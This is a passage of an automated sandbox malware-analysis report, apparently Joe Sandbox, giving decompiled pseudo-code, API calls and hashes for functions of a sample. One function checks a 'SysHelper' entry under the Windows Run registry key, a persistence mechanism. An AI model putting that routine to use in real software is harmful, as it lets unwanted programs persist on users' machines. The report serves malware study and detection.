					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae5
0x00454aea
0x00454af1
0x00454afa
0x00454b02
0x00454b5d
0x00454b62
0x00454b65
0x00454b74
0x00454bd3
0x00454bed
0x00454b76
0x00454b86
0x00454b8c
0x00454ba2
0x00454ba9
0x00454baf
0x00454bc4
0x00454bc4
0x00454b0f
0x00454b27
0x00454b43
0x00454b43

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
SysHelper, xrefs: 004123D6

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags);
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

0x00423576
0x00423581
0x00423584
0x00423587
0x0042358a
0x0042358d
0x0042358f
0x004235b1
0x004235b6
0x004235bc
0x004235be
0x00000000
0x004235c0
0x004235c0
0x004235c3
0x004235d7
0x004235d9
0x004235da
0x004235dd
0x004235e9
0x004235e9
0x004235f2
0x004235f8
0x004235fa
0x004237e5
0x004237e5
0x004237e6
0x004237e7
0x004237e8
0x004237e9
0x004237ea
0x004237ef
0x004237f3
0x004237f4
0x004237f7
0x004237fa
0x004237fc
0x0042380e
0x0042380f
0x00423815
0x00423818
0x00423819
0x0042381c
0x0042382e
0x0042381e
0x00423827
0x00423829
0x0042382b
0x00423832
0x00423837
0x0042383b
0x0042383d
0x00423847
0x00423849
0x0042384b
0x0042384d
0x0042384f
0x00423854
0x00423856
0x00423856
0x00423854
0x0042384d
0x0042383f
0x00423842
0x00423842
0x0042385d
0x0042385e
0x00423866
0x00423867
0x00423871
0x00423874
0x00423874
0x00423879
0x00423879
0x004237fe
0x004237fe
0x00423803
0x00423809
0x00423809
0x0042387e
0x00423600
0x00423604
0x0042360a
0x0042360c
0x00000000
0x00423612
0x00423616
0x0042361c
0x0042361e
0x00000000
0x00423624
0x00423624
0x00423624
0x00423627
0x00423629
0x0042362b
0x0042369b
0x0042369d
0x004236a4
0x004236a6
0x004236ac
0x004236af
0x004236de
0x004236e0
0x004236e3
0x004236e8
0x004236e9
0x004236eb
0x004236b1
0x004236b1
0x004236b2
0x004236b8
0x004236ba
0x00000000
0x004236bc
0x004236c2
0x004236c5
0x004236d0
0x004236d3
0x004236d5
0x004236d7
0x004236da
0x004236da
0x004236ba
0x004236f3
0x004236f8
0x004236fa
0x004236fc
0x00423701
0x00423704
0x00423706
0x00423706
0x0042370f
0x00423716
0x0042371b
0x0042371c
0x00423722
0x00423726
0x0042372b
0x0042372e
0x00423730
0x00423735
0x00423738
0x0042373b
0x0042373b
0x00423744
0x0042374b
0x00423750
0x00423751
0x00423757
0x0042375b
0x00423760
0x00423763
0x00423765
0x0042376a
0x0042376d
0x00423770
0x00423770
0x0042377e
0x00423780
0x00423782
0x004237af
0x004237b5
0x004237bc
0x004237bd
0x004237c0
0x004237c3
0x004237c6
0x004237c8
0x00000000
0x004237ca
0x004237cd
0x004237d4
0x004237d7
0x004237dd
0x004237e0
0x004237e0
0x00423784
0x00423784
0x0042378a
0x00423791
0x00423792
0x00423795
0x00423795
0x00423795
0x00423798
0x0042379b
0x0042379b
0x0042379b
0x0042379b
0x00423786
0x00423786
0x00423788
0x004237a5
0x004237a7
0x004237a9
0x00000000
0x004237ab
0x004237ab
0x004237ad
0x00000000
0x00000000
0x004237ad
0x004237a9
0x00000000
0x00000000
0x00000000
0x00423788
0x00423784
0x00000000
0x00423782
0x0042362d
0x0042362d
0x00423637
0x0042363a
0x00423641
0x00423643
0x00423647
0x0042364a
0x00423651
0x00423653
0x00423659
0x0042365c
0x0042379e
0x0042379e
0x00423662
0x00423662
0x00423663
0x00423669
0x0042366b
0x00000000
0x00423671
0x00423674
0x00423675
0x0042367c
0x00423680
0x00423687
0x00423689
0x0042368f
0x00000000
0x0042368f
0x00423689
0x0042366b
0x0042365c
0x0042362f
0x0042362f
0x00423635
0x00000000
0x00000000
0x00000000
0x00000000
0x00423635
0x0042362d
0x00000000
0x0042362b
0x0042361e
0x0042360c
0x004235df
0x004235df
0x00000000
0x004235e1
0x004235e1
0x004235e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004235e7
0x004235df
0x004235c5
0x004235c5
0x004235cb
0x004235cb
0x004235d2
0x004235d3
0x00000000
0x004235c7
0x004235c7
0x004235c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004235c9
0x004235c5
0x004235c3
0x00423591
0x00423591
0x00423591
0x00423598
0x00423599
0x0042359b
0x004235a0
0x004235a0
0x004235a2
0x004235a8
0x004235a8

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

0x00418003
0x00418005
0x00418008
0x0041800b
0x00418010
0x00418342
0x00418342
0x00418347
0x0041834c
0x0041834d
0x0041834e
0x0041834f
0x00418352
0x00418016
0x0041801a
0x0041801d
0x00418022
0x00000000
0x00418028
0x0041802b
0x0041802f
0x00418039
0x0041803c
0x00418042
0x00418044
0x0041804f
0x00418338
0x0041833d
0x00000000
0x00418055
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418065
0x00418067
0x0041806c
0x00418071
0x00418074
0x00418074
0x00418077
0x0041807c
0x004180f3
0x004180f5
0x0041816a
0x0041816d
0x004181e3
0x004181e6
0x004181e9
0x0041825e
0x00418261
0x0041826a
0x00418263
0x00418265
0x00418265
0x0041826d
0x00418270
0x00418276
0x00418272
0x00418272
0x00418272
0x00418278
0x0041827a
0x0041827f
0x00418288
0x0041828d
0x00418290
0x00418290
0x00418293
0x00418296
0x00418299
0x004182a2
0x0041829b
0x0041829d
0x0041829d
0x004182a5
0x004182a8
0x004182ae
0x004182aa
0x004182aa
0x004182aa
0x004182b0
0x004182b3
0x004182b5
0x004182c3
0x004182c6
0x004182cb
0x004182cb
0x004182ce
0x004182d1
0x004182d4
0x004182dd
0x004182d6
0x004182d8
0x004182d8
0x004182e0
0x004182e3
0x004182e9
0x004182e5
0x004182e5
0x004182e5
0x004182eb
0x004182f0
0x004182f0
0x004182f2
0x004182f4
0x004182fd
0x00418302
0x00418302
0x00000000
0x00418302
0x004181eb
0x004181eb
0x004181ee
0x004181fa
0x004181f0
0x004181f2
0x004181f5
0x004181f5
0x004181fd
0x00418200
0x00418209
0x00418202
0x00418204
0x00418204
0x0041820c
0x0041820e
0x0041821e
0x00418221
0x00418226
0x00418229
0x00418229
0x0041822c
0x0041822f
0x00418232
0x00418238
0x00418234
0x00418234
0x00418234
0x0041823a
0x0041823d
0x00418243
0x0041823f
0x0041823f
0x0041823f
0x00418245
0x00418247
0x00418254
0x00418255
0x00418256
0x00000000
0x00418256
0x00418247
0x0041816f
0x0041816f
0x00418172
0x00418175
0x00418181
0x00418177
0x00418179
0x0041817c
0x0041817c
0x00418184
0x00418187
0x00418190
0x00418189
0x0041818b
0x0041818b
0x00418193
0x00418195
0x004181a5
0x004181a8
0x004181ad
0x004181ad
0x004181b0
0x004181b3
